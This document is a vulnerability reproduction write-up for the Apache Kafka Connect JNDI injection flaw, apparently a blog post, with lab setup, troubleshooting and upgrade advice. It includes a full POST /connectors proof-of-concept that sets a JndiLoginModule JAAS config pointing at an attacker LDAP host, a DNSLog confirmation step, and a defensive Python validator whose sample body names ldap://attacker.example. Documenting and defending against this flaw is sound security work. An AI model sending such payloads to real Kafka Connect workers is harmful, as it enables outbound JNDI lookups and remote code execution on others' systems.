1. Product introduction
Kafka Connect is a tool for scalable and reliable streaming of data between Apache Kafka and other systems. It makes it simple to quickly define connectors that move large amounts of data into and out of Kafka. Kafka Connect can ingest entire databases or collect metrics from all application servers into Kafka topics, making data available for low-latency stream processing.
2. Vulnerability overview
Apache Kafka Connect contains a JNDI injection vulnerability. An attacker who can reach a Kafka Connect worker and create or modify connectors can point one of the connector's Kafka clients at an arbitrary JAAS login module: the sasl.jaas.config property (set through producer.override.sasl.jaas.config, consumer.override.sasl.jaas.config or admin.override.sasl.jaas.config, or through a connector-specific client prefix) is set to com.sun.security.auth.module.JndiLoginModule with a provider URL under the attacker's control. The worker then performs a JNDI lookup against that server and deserializes the response. Turning this into remote code execution requires either an older JDK that still permits remote class loading through JNDI, or a usable deserialization gadget chain on the Kafka Connect worker's classpath.
3. Scope of influence
Affected version
2.3.0 <= Apache Kafka <= 3.3.2
Unaffected version
Apache Kafka >= 3.4.0
4. Reproduce the environment
Windows 10 with a Kafka 2.4.0 integrated environment (set up the JDK and MySQL yourself)
I am using jdk-11.0.18_windows-x64_bin.exe (JDK 8 also works; JDK 11 is recommended)
MySQL 5.7.27
Kafka2.4.0 integrated environment download address: https://download.csdn.net/download/qq_41904294/87588240
5. Vulnerability recurrence
Start the environment
bin\windows\zookeeper-server-start.bat config\zookeeper.properties
bin\windows\kafka-server-start.bat config\server.properties
bin\windows\connect-standalone.bat config/connect-standalone.properties config/connect-file-source.properties config/connect-file-sink.properties
If you get the error "The input line is too long. The command syntax is incorrect", the cause is the Windows command-line length limit of 8192 characters. The Kafka start scripts build the classpath by concatenating the absolute path of every jar in the installation; when Kafka sits deep in the directory tree, the resulting classpath exceeds that limit.
Solution: shorten the directory tree by placing the Kafka installation directory directly under the drive root.
Browse to the Connect REST API to confirm the worker is up.
Capture the response in Burp (or use curl) to check which connector plugins are installed; the POC below depends on the Debezium MySQL connector being present:
http://x.x.x.x:8083/connector-plugins
POC currently circulating on the Internet
POST /connectors HTTP/1.1
Host: 127.0.0.1:8083
Content-Type: application/json
Content-Length: 821
{
  "name": "xxx",
  "config": {
    "connector.class": "io.debezium.connector.mysql.MySqlConnector",
    "database.hostname": "127.0.0.1",
    "database.port": "3306",
    "database.user": "root",
    "database.password": "xxxx",
    "database.server.id": "xxxx",
    "database.server.name": "xxxx",
    "database.history.kafka.bootstrap.servers": "127.0.0.1:9092",
    "database.history.kafka.topic": "xxxx",
    "database.history.producer.security.protocol": "SASL_SSL",
    "database.history.producer.sasl.mechanism": "PLAIN",
    "database.history.producer.sasl.jaas.config": "com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://xxxx\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
  }
}
POC principle: when the MySQL connector is created, the sasl.jaas.config of the producer that Debezium uses for its schema history topic (the database.history.producer.* prefix) is set to com.sun.security.auth.module.JndiLoginModule. When that producer initialises its SASL login, the JndiLoginModule performs a JNDI lookup of user.provider.url, so the worker connects to the attacker's LDAP server and deserializes whatever it returns. The Debezium prefix is only one route: since Kafka 2.3.0 the worker's default connector.client.config.override.policy (All) lets any connector supply producer.override.sasl.jaas.config, consumer.override.sasl.jaas.config or admin.override.sasl.jaas.config, so the same injection works without Debezium.
Point user.provider.url at a DNSLog domain (ldap://<your-dnslog-domain>) and watch for the DNS lookup to confirm that the worker makes the outbound JNDI request.
An error was reported. Checking the error output of the environment showed that the server time zone could not be recognized. I found a method on the Internet that changes the database time zone with set time_zone='+8:00'; but it did not work when I tried it. Reading the article again, I looked at how to specify the database time zone when creating a connector.
Adding the configuration "database.serverTimezone" solved it (I don't understand why a US time zone is specified here; anyone who knows, please give me some pointers).
"config": {
  ...
  "database.serverTimezone": "America/Los_Angeles",
  ...
}
Re-verify
The DNS callback arrives, confirming that the vulnerability exists.
6. Repair suggestion
An official fixed release is available. Affected users should upgrade to Apache Kafka 3.4.0 or later, which refuses com.sun.security.auth.module.JndiLoginModule in any sasl.jaas.config by default (the rejected modules are controlled by the org.apache.kafka.disallowed.login.modules system property, which can be extended with further module names).
Users who cannot upgrade yet can mitigate the vulnerability by validating Kafka Connect connector configurations before they are accepted, allowing only trusted login modules in every sasl.jaas.config property, and by restricting who can reach the Connect REST API, since exploitation requires the ability to create or modify connectors. Connector dependencies should also be checked for vulnerable versions and upgraded or removed, because they provide the gadget chains that turn the JNDI lookup into code execution.
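The following is an added example, not code from the original post or from the Kafka project, showing the configuration validation described above applied to the POC request from section 5. It scans a connector request body for every property whose name ends in sasl.jaas.config, whatever prefix precedes it (producer.override., consumer.override., admin.override., or a connector-specific prefix such as Debezium's database.history.producer.), extracts the login module class from the JAAS string and rejects anything outside an allowlist, flagging JndiLoginModule explicitly. The allowlist, the sample request bodies and the attacker hostname are constructed for the example.

```python
import re

# Login modules Kafka clients legitimately use for SASL. Anything else, in
# particular com.sun.security.auth.module.JndiLoginModule, is rejected.
# (This allowlist is an assumption for the example; trim it to what your
# connectors actually use.)
ALLOWED_LOGIN_MODULES = {
    "org.apache.kafka.common.security.plain.PlainLoginModule",
    "org.apache.kafka.common.security.scram.ScramLoginModule",
    "org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule",
    "com.sun.security.auth.module.Krb5LoginModule",
}

JNDI_LOGIN_MODULE = "com.sun.security.auth.module.JndiLoginModule"

# A JAAS config value starts with "<LoginModuleClass> <control flag> ...;".
JAAS_ENTRY_RE = re.compile(
    r"^\s*([A-Za-z_$][\w$.]*)\s+(required|requisite|sufficient|optional)\b",
    re.IGNORECASE,
)


def connector_config(body):
    """Accept either a POST /connectors body ({"name": ..., "config": {...}})
    or a bare PUT /connectors/<name>/config body ({...})."""
    return body["config"] if isinstance(body.get("config"), dict) else body


def jaas_entries(config):
    """Every property whose key ends in sasl.jaas.config, regardless of prefix."""
    return [(k, v) for k, v in config.items() if k.endswith("sasl.jaas.config")]


def login_module(jaas_value):
    """Class name of the login module a JAAS config string instantiates, or None."""
    m = JAAS_ENTRY_RE.match(jaas_value)
    return m.group(1) if m else None


def validate(body):
    """Return a list of findings; an empty list means the connector config passes."""
    findings = []
    for key, value in jaas_entries(connector_config(body)):
        module = login_module(value)
        if module is None:
            findings.append(f"{key}: unparseable JAAS config")
        elif module == JNDI_LOGIN_MODULE:
            findings.append(f"{key}: JndiLoginModule performs a JNDI lookup of provider.url")
        elif module not in ALLOWED_LOGIN_MODULES:
            findings.append(f"{key}: login module {module} is not on the allowlist")
    return findings


# Constructed sample bodies (not captured from a real worker). The first mirrors
# the shape of the POC request; attacker.example is a placeholder hostname.
POC_LIKE_BODY = {
    "name": "xxx",
    "config": {
        "connector.class": "io.debezium.connector.mysql.MySqlConnector",
        "database.history.producer.security.protocol": "SASL_SSL",
        "database.history.producer.sasl.mechanism": "PLAIN",
        "database.history.producer.sasl.jaas.config":
            "com.sun.security.auth.module.JndiLoginModule required "
            'user.provider.url="ldap://attacker.example/x" useFirstPass="true";',
    },
}

BENIGN_BODY = {
    "name": "file-sink",
    "config": {
        "connector.class": "org.apache.kafka.connect.file.FileStreamSinkConnector",
        "consumer.override.sasl.jaas.config":
            "org.apache.kafka.common.security.plain.PlainLoginModule required "
            'username="svc" password="s3cret";',
    },
}

if __name__ == "__main__":
    for label, body in (("poc-like", POC_LIKE_BODY), ("benign", BENIGN_BODY)):
        print(label, validate(body) or "OK")
```

Run this over the JSON body before forwarding a POST /connectors or PUT /connectors/<name>/config to the worker, or over the output of GET /connectors/<name>/config for each existing connector to audit what is already deployed. Matching on the key suffix rather than on a fixed list of prefixes is deliberate: connectors are free to embed their own Kafka clients under any prefix, as the Debezium history producer shows.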